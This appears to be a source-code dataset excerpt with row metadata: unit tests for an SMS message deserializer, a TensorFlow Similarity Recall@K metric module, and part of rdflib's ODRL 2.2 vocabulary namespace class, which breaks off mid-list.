"body": "Hello, world!",
"keyword": "kivord",
"operator": "31110"
}
""")
result = deserialize.mo_sms(response)
assert_is_instance(result, api.MoTextSms)
assert_equal('12345', result.recipient)
assert_equal('987654321', result.sender)
assert_equal(
'b88b4cee-168f-4721-bbf9-cd748dd93b60', result.message_id
)
assert_equal('Hello, world!', result.body)
assert_equal("kivord", result.keyword)
assert_equal(
datetime(2016, 12, 3, 16, 24, 23, 318000, UTC), result.sent_at
)
assert_equal(
datetime(2016, 12, 5, 16, 24, 23, 318000, UTC), result.received_at
)
def test_mo_text_sms_minimal():
response = MockResponse(
"""
{
"type": "mo_text",
"to": "12345",
"from": "987654321",
"id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
"received_at": "2016-12-05T16:24:23.318Z",
"body": "Hello, world!"
}
""")
result = deserialize.mo_sms(response)
assert_is_instance(result, api.MoTextSms)
assert_equal('12345', result.recipient)
assert_equal('987654321', result.sender)
assert_equal(
'b88b4cee-168f-4721-bbf9-cd748dd93b60', result.message_id
)
assert_equal('Hello, world!', result.body)
assert_equal(
datetime(2016, 12, 5, 16, 24, 23, 318000, UTC),
result.received_at
)
@raises(exceptions.UnexpectedResponseException)
def test_mo_text_sms_invalid_date_time():
response = MockResponse(
"""
{
"type": "mo_text",
"to": "12345",
"from": "987654321",
"id": "b88b4cee-168f-4721-bbf9-cd748dd93b60",
"received_at": "2016-12-05T16:24:23318Z",
"body": "Hello, world!"
}
""")
deserialize.mo_sms(response)
@raises(exceptions.UnexpectedResponseException)
def test_mo_unknown_sms():
response = MockResponse('{"type": "whatever"}')
deserialize.mo_sms(response)
def test_read_inbounds_page():
response = MockResponse(
"""
{
"count": 9,
"page": 3,
"inbounds": [
{
"type": "mo_text",
"to": "12345",
"from": "987654321",
"id": "b88b4cee",
"received_at": "2016-12-05T16:24:23.318Z",
"body": "Hello, world!"
},
{
"type": "mo_binary",
"to": "54321",
"from": "123456789",
"id": "cd748dd93b60",
"sent_at": "2016-12-03T16:24:23.318Z",
"received_at": "2016-12-05T16:24:23.318Z",
"body": "AwE=",
"udh": "00010203"
}
],
"page_size": 2
}
""")
result = deserialize.inbounds_page(response)
assert_equal(2, result.size)
assert_equal(3, result.page)
assert_equal(9, result.total_size)
assert_equal(2, len(result.content))
assert_is_instance(result.content[0], api.MoTextSms)
assert_equal('b88b4cee', result.content[0].message_id)
assert_is_instance(result.content[1], api.MoBinarySms)
assert_equal('cd748dd93b60', result.content[1].message_id)
| 16,850 | 6 | 576 |
8a2c28fd9c3b626ba88c7c0aa37a2c2f9aae24a5 | 3,390 | py | Python | tensorflow_similarity/retrieval_metrics/recall_at_k.py | phillips96/similarity | 3794f288f17f47f1f90b5368e5c0eeac1e81e10d | [
"Apache-2.0"
] | 706 | 2021-09-04T02:11:05.000Z | 2022-03-31T13:29:14.000Z | tensorflow_similarity/retrieval_metrics/recall_at_k.py | phillips96/similarity | 3794f288f17f47f1f90b5368e5c0eeac1e81e10d | [
"Apache-2.0"
] | 119 | 2021-09-01T22:32:40.000Z | 2022-03-30T22:39:27.000Z | tensorflow_similarity/retrieval_metrics/recall_at_k.py | phillips96/similarity | 3794f288f17f47f1f90b5368e5c0eeac1e81e10d | [
"Apache-2.0"
] | 57 | 2021-09-04T02:11:14.000Z | 2022-03-31T13:29:15.000Z | # Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from .retrieval_metric import RetrievalMetric
from tensorflow_similarity.types import FloatTensor, IntTensor, BoolTensor
class RecallAtK(RetrievalMetric):
"""The metric learning version of Recall@K.
A query is counted as a positive when ANY lookup in top K match the query
class, 0 otherwise.
Args:
name: Name associated with the metric object, e.g., recall@5
canonical_name: The canonical name associated with metric,
e.g., recall@K
k: The number of nearest neighbors over which the metric is computed.
distance_threshold: The max distance below which a nearest neighbor is
considered a valid match.
average: {'micro'} Determines the type of averaging performed over the
queries.
* 'micro': Calculates metrics globally over all queries.
* 'macro': Calculates metrics for each label and takes the unweighted
mean.
"""
def compute(
self,
*, # keyword only arguments see PEP-570
query_labels: IntTensor,
match_mask: BoolTensor,
**kwargs,
) -> FloatTensor:
"""Compute the metric
Args:
query_labels: A 1D tensor of the labels associated with the
embedding queries.
match_mask: A 2D mask where a 1 indicates a match between the
jth query and the kth neighbor and a 0 indicates a mismatch.
**kwargs: Additional compute args.
Returns:
A rank 0 tensor containing the metric.
"""
self._check_shape(query_labels, match_mask)
k_slice = match_mask[:, : self.k]
match_indicator = tf.math.reduce_any(k_slice, axis=1)
match_indicator = tf.cast(match_indicator, dtype="float")
if self.average == "micro":
recall_at_k = tf.math.reduce_mean(match_indicator)
elif self.average == "macro":
per_class_metrics = 0
class_labels = tf.unique(query_labels)[0]
# TODO(ovallis): potential slowness.
for label in class_labels:
idxs = tf.where(query_labels == label)
c_slice = tf.gather(match_indicator, indices=idxs)
per_class_metrics += tf.math.reduce_mean(c_slice)
recall_at_k = tf.math.divide(per_class_metrics, len(class_labels))
else:
raise ValueError(
f"{self.average} is not a supported average " "option"
)
result: FloatTensor = recall_at_k
return result
| 34.948454 | 78 | 0.646608 | # Copyright 2021 The TensorFlow Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import tensorflow as tf
from .retrieval_metric import RetrievalMetric
from tensorflow_similarity.types import FloatTensor, IntTensor, BoolTensor
class RecallAtK(RetrievalMetric):
"""The metric learning version of Recall@K.
A query is counted as a positive when ANY lookup in top K match the query
class, 0 otherwise.
Args:
name: Name associated with the metric object, e.g., recall@5
canonical_name: The canonical name associated with metric,
e.g., recall@K
k: The number of nearest neighbors over which the metric is computed.
distance_threshold: The max distance below which a nearest neighbor is
considered a valid match.
average: {'micro'} Determines the type of averaging performed over the
queries.
* 'micro': Calculates metrics globally over all queries.
* 'macro': Calculates metrics for each label and takes the unweighted
mean.
"""
def __init__(self, name: str = "recall", k: int = 5, **kwargs) -> None:
if "canonical_name" not in kwargs:
kwargs["canonical_name"] = "recall@k"
super().__init__(name=name, k=k, **kwargs)
def compute(
self,
*, # keyword only arguments see PEP-570
query_labels: IntTensor,
match_mask: BoolTensor,
**kwargs,
) -> FloatTensor:
"""Compute the metric
Args:
query_labels: A 1D tensor of the labels associated with the
embedding queries.
match_mask: A 2D mask where a 1 indicates a match between the
jth query and the kth neighbor and a 0 indicates a mismatch.
**kwargs: Additional compute args.
Returns:
A rank 0 tensor containing the metric.
"""
self._check_shape(query_labels, match_mask)
k_slice = match_mask[:, : self.k]
match_indicator = tf.math.reduce_any(k_slice, axis=1)
match_indicator = tf.cast(match_indicator, dtype="float")
if self.average == "micro":
recall_at_k = tf.math.reduce_mean(match_indicator)
elif self.average == "macro":
per_class_metrics = 0
class_labels = tf.unique(query_labels)[0]
# TODO(ovallis): potential slowness.
for label in class_labels:
idxs = tf.where(query_labels == label)
c_slice = tf.gather(match_indicator, indices=idxs)
per_class_metrics += tf.math.reduce_mean(c_slice)
recall_at_k = tf.math.divide(per_class_metrics, len(class_labels))
else:
raise ValueError(
f"{self.average} is not a supported average " "option"
)
result: FloatTensor = recall_at_k
return result
| 195 | 0 | 27 |
a9c8778b124fe87293be9117678ef66587e179af | 21,994 | py | Python | rdflib/namespace/_ODRL2.py | gtfierro/rdflib | be3d026e9065c8f60f59ac79a70da9f3199f5f43 | [
"BSD-3-Clause"
] | 1 | 2022-02-02T23:04:51.000Z | 2022-02-02T23:04:51.000Z | rdflib/namespace/_ODRL2.py | gtfierro/rdflib | be3d026e9065c8f60f59ac79a70da9f3199f5f43 | [
"BSD-3-Clause"
] | 6 | 2021-11-22T19:10:32.000Z | 2022-01-31T19:16:37.000Z | rdflib/namespace/_ODRL2.py | jjon/rdflib | 4c2ab7b392b353bf3c6088017ec9351ce8ac3db6 | [
"BSD-3-Clause"
] | null | null | null | from rdflib.namespace import DefinedNamespace, Namespace
from rdflib.term import URIRef
class ODRL2(DefinedNamespace):
"""
ODRL Version 2.2
The ODRL Vocabulary and Expression defines a set of concepts and terms (the vocabulary) and encoding mechanism
(the expression) for permissions and obligations statements describing digital content usage based on the ODRL
Information Model.
Generated from: https://www.w3.org/ns/odrl/2/ODRL22.ttl
Date: 2020-05-26 14:20:02.352356
"""
_fail = True
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
action: URIRef # The operation relating to the Asset for which the Rule is being subjected.
andSequence: URIRef # The relation is satisfied when each of the Constraints are satisfied in the order specified.
assignee: URIRef # The Party is the recipient of the Rule.
assigneeOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assignee functional role.
assigner: URIRef # The Party is the issuer of the Rule.
assignerOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assigner functional role.
attributedParty: URIRef # The Party to be attributed.
attributingParty: URIRef # The Party who undertakes the attribution.
compensatedParty: URIRef # The Party is the recipient of the compensation.
compensatingParty: URIRef # The Party that is the provider of the compensation.
conflict: URIRef # The conflict-resolution strategy for a Policy.
consentedParty: URIRef # The Party who obtains the consent.
consentingParty: URIRef # The Party to obtain consent from.
consequence: URIRef # Relates a Duty to another Duty, the latter being a consequence of not fulfilling the former.
constraint: URIRef # Constraint applied to a Rule
contractedParty: URIRef # The Party who is being contracted.
contractingParty: URIRef # The Party who is offering the contract.
dataType: URIRef # The datatype of the value of the rightOperand or rightOperandReference of a Constraint.
duty: URIRef # Relates an individual Duty to a Permission.
failure: URIRef # Failure is an abstract property that defines the violation (or unmet) relationship between Rules.
function: URIRef # Function is an abstract property whose sub-properties define the functional roles which may be fulfilled by a party in relation to a Rule.
hasPolicy: URIRef # Identifies an ODRL Policy for which the identified Asset is the target Asset to all the Rules.
implies: URIRef # An Action asserts that another Action is not prohibited to enable its operational semantics.
includedIn: URIRef # An Action transitively asserts that another Action that encompasses its operational semantics.
informedParty: URIRef # The Party to be informed of all uses.
informingParty: URIRef # The Party who provides the inform use data.
inheritAllowed: URIRef # Indicates if the Policy entity can be inherited.
inheritFrom: URIRef # Relates a (child) policy to another (parent) policy from which terms are inherited.
inheritRelation: URIRef # Identifies the type of inheritance.
leftOperand: URIRef # The left operand in a constraint expression.
obligation: URIRef # Relates an individual Duty to a Policy.
operand: URIRef # Operand is an abstract property for a logical relationship.
operator: URIRef # The operator function applied to operands of a Constraint
output: URIRef # The output property specifies the Asset which is created from the output of the Action.
partOf: URIRef # Identifies an Asset/PartyCollection that the Asset/Party is a member of.
payeeParty: URIRef # The Party is the recipient of the payment.
permission: URIRef # Relates an individual Permission to a Policy.
profile: URIRef # The identifier(s) of an ODRL Profile that the Policy conforms to.
prohibition: URIRef # Relates an individual Prohibition to a Policy.
proximity: URIRef # An value indicating the closeness or nearness.
refinement: URIRef # Constraint used to refine the semantics of an Action, or Party/Asset Collection
relation: URIRef # Relation is an abstract property which creates an explicit link between an Action and an Asset.
remedy: URIRef # Relates an individual remedy Duty to a Prohibition.
rightOperand: URIRef # The value of the right operand in a constraint expression.
rightOperandReference: URIRef # A reference to a web resource providing the value for the right operand of a Constraint.
scope: URIRef # The identifier of a scope that provides context to the extent of the entity.
source: URIRef # Reference to a Asset/PartyCollection
status: URIRef # the value generated from the leftOperand action or a value related to the leftOperand set as the reference for the comparison.
target: URIRef # The target property indicates the Asset that is the primary subject to which the Rule action directly applies.
timedCount: URIRef # The number of seconds after which timed metering use of the asset begins.
trackedParty: URIRef # The Party whose usage is being tracked.
trackingParty: URIRef # The Party who is tracking usage.
uid: URIRef # An unambiguous identifier
undefined: URIRef # Relates the strategy used for handling undefined actions to a Policy.
unit: URIRef # The unit of measurement of the value of the rightOperand or rightOperandReference of a Constraint.
xone: URIRef # The relation is satisfied when only one, and not more, of the Constraints is satisfied
# http://www.w3.org/2002/07/owl#NamedIndividual
All: URIRef # Specifies that the scope of the relationship is all of the collective individuals within a context.
All2ndConnections: URIRef # Specifies that the scope of the relationship is all of the second-level connections to the Party.
AllConnections: URIRef # Specifies that the scope of the relationship is all of the first-level connections of the Party.
AllGroups: URIRef # Specifies that the scope of the relationship is all of the group connections of the Party.
Group: URIRef # Specifies that the scope of the relationship is the defined group with multiple individual members.
Individual: URIRef # Specifies that the scope of the relationship is the single Party individual.
absolutePosition: URIRef # A point in space or time defined with absolute coordinates for the positioning of the target Asset.
absoluteSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects of the target Asset.
absoluteSpatialPosition: URIRef # The absolute spatial positions of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space for the target Asset to fit.
absoluteTemporalPosition: URIRef # The absolute temporal positions in a media stream the target Asset has to fit.
count: URIRef # Numeric count of executions of the action of the Rule.
dateTime: URIRef # The date (and optional time and timezone) of exercising the action of the Rule. Right operand value MUST be an xsd:date or xsd:dateTime as defined by [[xmlschema11-2]].
delayPeriod: URIRef # A time delay period prior to exercising the action of the Rule. The point in time triggering this period MAY be defined by another temporal Constraint combined by a Logical Constraint (utilising the odrl:andSequence operand). Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
deliveryChannel: URIRef # The delivery channel used for exercising the action of the Rule.
device: URIRef # An identified device used for exercising the action of the Rule.
elapsedTime: URIRef # A continuous elapsed time period which may be used for exercising of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
eq: URIRef # Indicating that a given value equals the right operand of the Constraint.
event: URIRef # An identified event setting a context for exercising the action of the Rule.
fileFormat: URIRef # A transformed file format of the target Asset.
gt: URIRef # Indicating that a given value is greater than the right operand of the Constraint.
gteq: URIRef # Indicating that a given value is greater than or equal to the right operand of the Constraint.
hasPart: URIRef # A set-based operator indicating that a given value contains the right operand of the Constraint.
ignore: URIRef # The Action is to be ignored and is not part of the policy โ and the policy remains valid.
industry: URIRef # A defined industry sector setting a context for exercising the action of the Rule.
invalid: URIRef # The policy is void.
isA: URIRef # A set-based operator indicating that a given value is an instance of the right operand of the Constraint.
isAllOf: URIRef # A set-based operator indicating that a given value is all of the right operand of the Constraint.
isAnyOf: URIRef # A set-based operator indicating that a given value is any of the right operand of the Constraint.
isNoneOf: URIRef # A set-based operator indicating that a given value is none of the right operand of the Constraint.
isPartOf: URIRef # A set-based operator indicating that a given value is contained by the right operand of the Constraint.
language: URIRef # A natural language used by the target Asset.
lt: URIRef # Indicating that a given value is less than the right operand of the Constraint.
lteq: URIRef # Indicating that a given value is less than or equal to the right operand of the Constraint.
media: URIRef # Category of a media asset setting a context for exercising the action of the Rule.
meteredTime: URIRef # An accumulated amount of one to many metered time periods which were used for exercising the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
neq: URIRef # Indicating that a given value is not equal to the right operand of the Constraint.
payAmount: URIRef # The amount of a financial payment. Right operand value MUST be an xsd:decimal.
percentage: URIRef # A percentage amount of the target Asset relevant for exercising the action of the Rule. Right operand value MUST be an xsd:decimal from 0 to 100.
perm: URIRef # Permissions take preference over prohibitions.
policyUsage: URIRef # Indicates the actual datetime the action of the Rule was exercised.
product: URIRef # Category of product or service setting a context for exercising the action of the Rule.
prohibit: URIRef # Prohibitions take preference over permissions.
purpose: URIRef # A defined purpose for exercising the action of the Rule.
recipient: URIRef # The party receiving the result/outcome of exercising the action of the Rule.
relativePosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
relativeSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects - expressed as percentages of full values - of the target Asset.
relativeSpatialPosition: URIRef # The relative spatial positions - expressed as percentages of full values - of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space of the target Asset.
relativeTemporalPosition: URIRef # A point in space or time defined with coordinates relative to full measures the positioning of the target Asset.
resolution: URIRef # Resolution of the rendition of the target Asset.
spatial: URIRef # A named and identified geospatial area with defined borders which is used for exercising the action of the Rule. An IRI MUST be used to represent this value.
spatialCoordinates: URIRef # A set of coordinates setting the borders of a geospatial area used for exercising the action of the Rule. The coordinates MUST include longitude and latitude, they MAY include altitude and the geodetic datum.
support: URIRef # The Action is to be supported as part of the policy โ and the policy remains valid.
system: URIRef # An identified computing system used for exercising the action of the Rule.
systemDevice: URIRef # An identified computing system or computing device used for exercising the action of the Rule.
timeInterval: URIRef # A recurring period of time before the next execution of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
unitOfCount: URIRef # The unit of measure used for counting the executions of the action of the Rule.
version: URIRef # The version of the target Asset.
virtualLocation: URIRef # An identified location of the IT communication space which is relevant for exercising the action of the Rule.
# http://www.w3.org/2004/02/skos/core#Collection
# http://www.w3.org/2004/02/skos/core#Concept
Action: URIRef # An operation on an Asset.
Agreement: URIRef # A Policy that grants the assignee a Rule over an Asset from an assigner.
Assertion: URIRef # A Policy that asserts a Rule over an Asset from parties.
Asset: URIRef # A resource or a collection of resources that are the subject of a Rule.
AssetCollection: URIRef # An Asset that is collection of individual resources
AssetScope: URIRef # Scopes for Asset Scope expressions.
ConflictTerm: URIRef # Used to establish strategies to resolve conflicts that arise from the merging of Policies or conflicts between Permissions and Prohibitions in the same Policy.
Constraint: URIRef # A boolean expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Duty: URIRef # The obligation to perform an Action
LeftOperand: URIRef # Left operand for a constraint expression.
LogicalConstraint: URIRef # A logical expression that refines the semantics of an Action and Party/Asset Collection or declare the conditions applicable to a Rule.
Offer: URIRef # A Policy that proposes a Rule over an Asset from an assigner.
Operator: URIRef # Operator for constraint expression.
Party: URIRef # An entity or a collection of entities that undertake Roles in a Rule.
PartyCollection: URIRef # A Party that is a group of individual entities
PartyScope: URIRef # Scopes for Party Scope expressions.
Permission: URIRef # The ability to perform an Action over an Asset.
Policy: URIRef # A non-empty group of Permissions and/or Prohibitions.
Privacy: URIRef # A Policy that expresses a Rule over an Asset containing personal information.
Prohibition: URIRef # The inability to perform an Action over an Asset.
Request: URIRef # A Policy that proposes a Rule over an Asset from an assignee.
RightOperand: URIRef # Right operand for constraint expression.
Rule: URIRef # An abstract concept that represents the common characteristics of Permissions, Prohibitions, and Duties.
Set: URIRef # A Policy that expresses a Rule over an Asset.
Ticket: URIRef # A Policy that grants the holder a Rule over an Asset from an assigner.
UndefinedTerm: URIRef # Is used to indicate how to support Actions that are not part of any vocabulary or profile in the policy expression system.
acceptTracking: URIRef # To accept that the use of the Asset may be tracked.
adHocShare: URIRef # The act of sharing the asset to parties in close proximity to the owner.
aggregate: URIRef # To use the Asset or parts of it as part of a composite collection.
annotate: URIRef # To add explanatory notations/commentaries to the Asset without modifying the Asset in any other way.
anonymize: URIRef # To anonymize all or parts of the Asset.
append: URIRef # The act of adding to the end of an asset.
appendTo: URIRef # The act of appending data to the Asset without modifying the Asset in any other way.
archive: URIRef # To store the Asset (in a non-transient form).
attachPolicy: URIRef # The act of keeping the policy notice with the asset.
attachSource: URIRef # The act of attaching the source of the asset and its derivatives.
attribute: URIRef # To attribute the use of the Asset.
commercialize: URIRef # The act of using the asset in a business environment.
compensate: URIRef # To compensate by transfer of some amount of value, if defined, for using or selling the Asset.
concurrentUse: URIRef # To create multiple copies of the Asset that are being concurrently used.
copy: URIRef # The act of making an exact reproduction of the asset.
core: URIRef # Identifier for the ODRL Core Profile
delete: URIRef # To permanently remove all copies of the Asset after it has been used.
derive: URIRef # To create a new derivative Asset from this Asset and to edit or modify the derivative.
digitize: URIRef # To produce a digital copy of (or otherwise digitize) the Asset from its analogue form.
display: URIRef # To create a static and transient rendition of an Asset.
distribute: URIRef # To supply the Asset to third-parties.
ensureExclusivity: URIRef # To ensure that the Rule on the Asset is exclusive.
execute: URIRef # To run the computer program Asset.
export: URIRef # The act of transforming the asset into a new form.
extract: URIRef # To extract parts of the Asset and to use it as a new Asset.
extractChar: URIRef # The act of extracting (replicating) unchanged characters from the asset.
extractPage: URIRef # The act of extracting (replicating) unchanged pages from the asset.
extractWord: URIRef # The act of extracting (replicating) unchanged words from the asset.
give: URIRef # To transfer the ownership of the Asset to a third party without compensation and while deleting the original asset.
grantUse: URIRef # To grant the use of the Asset to third parties.
include: URIRef # To include other related assets in the Asset.
index: URIRef # To record the Asset in an index.
inform: URIRef # To inform that an action has been performed on or in relation to the Asset.
install: URIRef # To load the computer program Asset onto a storage device which allows operating or running the Asset.
lease: URIRef # The act of making available the asset to a third-party for a fixed period of time with exchange of value.
lend: URIRef # The act of making available the asset to a third-party for a fixed period of time without exchange of value.
license: URIRef # The act of granting the right to use the asset to a third-party.
modify: URIRef # To change existing content of the Asset. A new asset is not created by this action.
move: URIRef # To move the Asset from one digital location to another including deleting the original copy.
nextPolicy: URIRef # To grant the specified Policy to a third party for their use of the Asset.
obtainConsent: URIRef # To obtain verifiable consent to perform the requested action in relation to the Asset.
pay: URIRef # The act of paying a financial amount to a party for use of the asset.
play: URIRef # To create a sequential and transient rendition of an Asset.
present: URIRef # To publicly perform the Asset.
preview: URIRef # The act of providing a short preview of the asset.
print: URIRef # To create a tangible and permanent rendition of an Asset.
read: URIRef # To obtain data from the Asset.
reproduce: URIRef # To make duplicate copies the Asset in any material form.
reviewPolicy: URIRef # To review the Policy applicable to the Asset.
secondaryUse: URIRef # The act of using the asset for a purpose other than the purpose it was intended for.
sell: URIRef # To transfer the ownership of the Asset to a third party with compensation and while deleting the original asset.
share: URIRef # The act of the non-commercial reproduction and distribution of the asset to third-parties.
shareAlike: URIRef # The act of distributing any derivative asset under the same terms as the original asset.
stream: URIRef # To deliver the Asset in real-time.
synchronize: URIRef # To use the Asset in timed relations with media (audio/visual) elements of another Asset.
textToSpeech: URIRef # To have a text Asset read out loud.
transfer: URIRef # To transfer the ownership of the Asset in perpetuity.
transform: URIRef # To convert the Asset into a different format.
translate: URIRef # To translate the original natural language of an Asset into another natural language.
uninstall: URIRef # To unload and delete the computer program Asset from a storage device and disable its readiness for operation.
use: URIRef # To use the Asset
watermark: URIRef # To apply a watermark to the Asset.
write: URIRef # The act of writing to the Asset.
writeTo: URIRef # The act of adding data to the Asset.
# Valid non-python identifiers
_extras = [
"and",
"or",
"#actionConcepts",
"#actions",
"#actionsCommon",
"#assetConcepts",
"#assetParty",
"#assetRelations",
"#assetRelationsCommon",
"#conflictConcepts",
"#constraintLeftOperandCommon",
"#constraintLogicalOperands",
"#constraintRelationalOperators",
"#constraintRightOpCommon",
"#constraints",
"#deprecatedTerms",
"#duties",
"#logicalConstraints",
"#partyConcepts",
"#partyRoles",
"#partyRolesCommon",
"#permissions",
"#policyConcepts",
"#policySubClasses",
"#policySubClassesCommon",
"#prohibitions",
"#ruleConcepts",
]
_NS = Namespace("http://www.w3.org/ns/odrl/2/")
| 83.310606 | 329 | 0.747067 | from rdflib.namespace import DefinedNamespace, Namespace
from rdflib.term import URIRef
class ODRL2(DefinedNamespace):
"""
ODRL Version 2.2
The ODRL Vocabulary and Expression defines a set of concepts and terms (the vocabulary) and encoding mechanism
(the expression) for permissions and obligations statements describing digital content usage based on the ODRL
Information Model.
Generated from: https://www.w3.org/ns/odrl/2/ODRL22.ttl
Date: 2020-05-26 14:20:02.352356
"""
_fail = True
# http://www.w3.org/1999/02/22-rdf-syntax-ns#Property
action: URIRef # The operation relating to the Asset for which the Rule is being subjected.
andSequence: URIRef # The relation is satisfied when each of the Constraints are satisfied in the order specified.
assignee: URIRef # The Party is the recipient of the Rule.
assigneeOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assignee functional role.
assigner: URIRef # The Party is the issuer of the Rule.
assignerOf: URIRef # Identifies an ODRL Policy for which the identified Party undertakes the assigner functional role.
attributedParty: URIRef # The Party to be attributed.
attributingParty: URIRef # The Party who undertakes the attribution.
compensatedParty: URIRef # The Party is the recipient of the compensation.
compensatingParty: URIRef # The Party that is the provider of the compensation.
conflict: URIRef # The conflict-resolution strategy for a Policy.
consentedParty: URIRef # The Party who obtains the consent.
consentingParty: URIRef # The Party to obtain consent from.
consequence: URIRef # Relates a Duty to another Duty, the latter being a consequence of not fulfilling the former.
constraint: URIRef # Constraint applied to a Rule
contractedParty: URIRef # The Party who is being contracted.
contractingParty: URIRef # The Party who is offering the contract.
dataType: URIRef # The datatype of the value of the rightOperand or rightOperandReference of a Constraint.
duty: URIRef # Relates an individual Duty to a Permission.
failure: URIRef # Failure is an abstract property that defines the violation (or unmet) relationship between Rules.
function: URIRef # Function is an abstract property whose sub-properties define the functional roles which may be fulfilled by a party in relation to a Rule.
hasPolicy: URIRef # Identifies an ODRL Policy for which the identified Asset is the target Asset to all the Rules.
implies: URIRef # An Action asserts that another Action is not prohibited to enable its operational semantics.
includedIn: URIRef # An Action transitively asserts that another Action that encompasses its operational semantics.
informedParty: URIRef # The Party to be informed of all uses.
informingParty: URIRef # The Party who provides the inform use data.
inheritAllowed: URIRef # Indicates if the Policy entity can be inherited.
inheritFrom: URIRef # Relates a (child) policy to another (parent) policy from which terms are inherited.
inheritRelation: URIRef # Identifies the type of inheritance.
leftOperand: URIRef # The left operand in a constraint expression.
obligation: URIRef # Relates an individual Duty to a Policy.
operand: URIRef # Operand is an abstract property for a logical relationship.
operator: URIRef # The operator function applied to operands of a Constraint
output: URIRef # The output property specifies the Asset which is created from the output of the Action.
partOf: URIRef # Identifies an Asset/PartyCollection that the Asset/Party is a member of.
payeeParty: URIRef # The Party is the recipient of the payment.
permission: URIRef # Relates an individual Permission to a Policy.
profile: URIRef # The identifier(s) of an ODRL Profile that the Policy conforms to.
prohibition: URIRef # Relates an individual Prohibition to a Policy.
proximity: URIRef # An value indicating the closeness or nearness.
refinement: URIRef # Constraint used to refine the semantics of an Action, or Party/Asset Collection
relation: URIRef # Relation is an abstract property which creates an explicit link between an Action and an Asset.
remedy: URIRef # Relates an individual remedy Duty to a Prohibition.
rightOperand: URIRef # The value of the right operand in a constraint expression.
rightOperandReference: URIRef # A reference to a web resource providing the value for the right operand of a Constraint.
scope: URIRef # The identifier of a scope that provides context to the extent of the entity.
source: URIRef # Reference to a Asset/PartyCollection
status: URIRef # the value generated from the leftOperand action or a value related to the leftOperand set as the reference for the comparison.
target: URIRef # The target property indicates the Asset that is the primary subject to which the Rule action directly applies.
timedCount: URIRef # The number of seconds after which timed metering use of the asset begins.
trackedParty: URIRef # The Party whose usage is being tracked.
trackingParty: URIRef # The Party who is tracking usage.
uid: URIRef # An unambiguous identifier
undefined: URIRef # Relates the strategy used for handling undefined actions to a Policy.
unit: URIRef # The unit of measurement of the value of the rightOperand or rightOperandReference of a Constraint.
xone: URIRef # The relation is satisfied when only one, and not more, of the Constraints is satisfied
# http://www.w3.org/2002/07/owl#NamedIndividual
All: URIRef # Specifies that the scope of the relationship is all of the collective individuals within a context.
All2ndConnections: URIRef # Specifies that the scope of the relationship is all of the second-level connections to the Party.
AllConnections: URIRef # Specifies that the scope of the relationship is all of the first-level connections of the Party.
AllGroups: URIRef # Specifies that the scope of the relationship is all of the group connections of the Party.
Group: URIRef # Specifies that the scope of the relationship is the defined group with multiple individual members.
Individual: URIRef # Specifies that the scope of the relationship is the single Party individual.
absolutePosition: URIRef # A point in space or time defined with absolute coordinates for the positioning of the target Asset.
absoluteSize: URIRef # Measure(s) of one or two axes for 2D-objects or measure(s) of one to tree axes for 3D-objects of the target Asset.
absoluteSpatialPosition: URIRef # The absolute spatial positions of four corners of a rectangle on a 2D-canvas or the eight corners of a cuboid in a 3D-space for the target Asset to fit.
absoluteTemporalPosition: URIRef # The absolute temporal positions in a media stream the target Asset has to fit.
count: URIRef # Numeric count of executions of the action of the Rule.
dateTime: URIRef # The date (and optional time and timezone) of exercising the action of the Rule. Right operand value MUST be an xsd:date or xsd:dateTime as defined by [[xmlschema11-2]].
delayPeriod: URIRef # A time delay period prior to exercising the action of the Rule. The point in time triggering this period MAY be defined by another temporal Constraint combined by a Logical Constraint (utilising the odrl:andSequence operand). Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
deliveryChannel: URIRef # The delivery channel used for exercising the action of the Rule.
device: URIRef # An identified device used for exercising the action of the Rule.
elapsedTime: URIRef # A continuous elapsed time period which may be used for exercising of the action of the Rule. Right operand value MUST be an xsd:duration as defined by [[xmlschema11-2]].
eq: URIRef # Indicating that a given value equals the right operand of the Constraint.
event: URIRef # An identified event setting a context for exercising the action of the Rule.
fileFormat: URIRef # A transformed file format of the target Asset.
gt: URIRef # Indicating that a given value is greater than the right operand of the Constraint.
gteq: URIRef # Indicating that a given value is greater than or equal to the right operand of the Constraint.
hasPart: URIRef # A set-based operator indicating that a given value contains the right operand of the Constraint.
ignore: URIRef # The Action is to be ignored and is not part of the policy โ and the policy remains valid.
industry: URIRef # A defined industry sector setting a context for exercising the action of the Rule.
invalid: URIRef # The policy is void.
isA: URIRef # A set-based operator indicating that a given value is an instance of the right operand of the Constraint.
isAllOf: URIRef # A set-based operator indicating that a given value is all of the right operand of the Constraint.
isAnyOf: URIRef # A set-based operator indicating that a given value is any of the right operand of the Constraint.
isNoneOf: URIRef # A set-based operator indicating that a given value is none of the right operand of the Constraint.
isPartOf: URIRef # A set-based operator indicating that a given value is contained by the right operand of the Constraint.
language: URIRef # A natural language used by the target Asset.
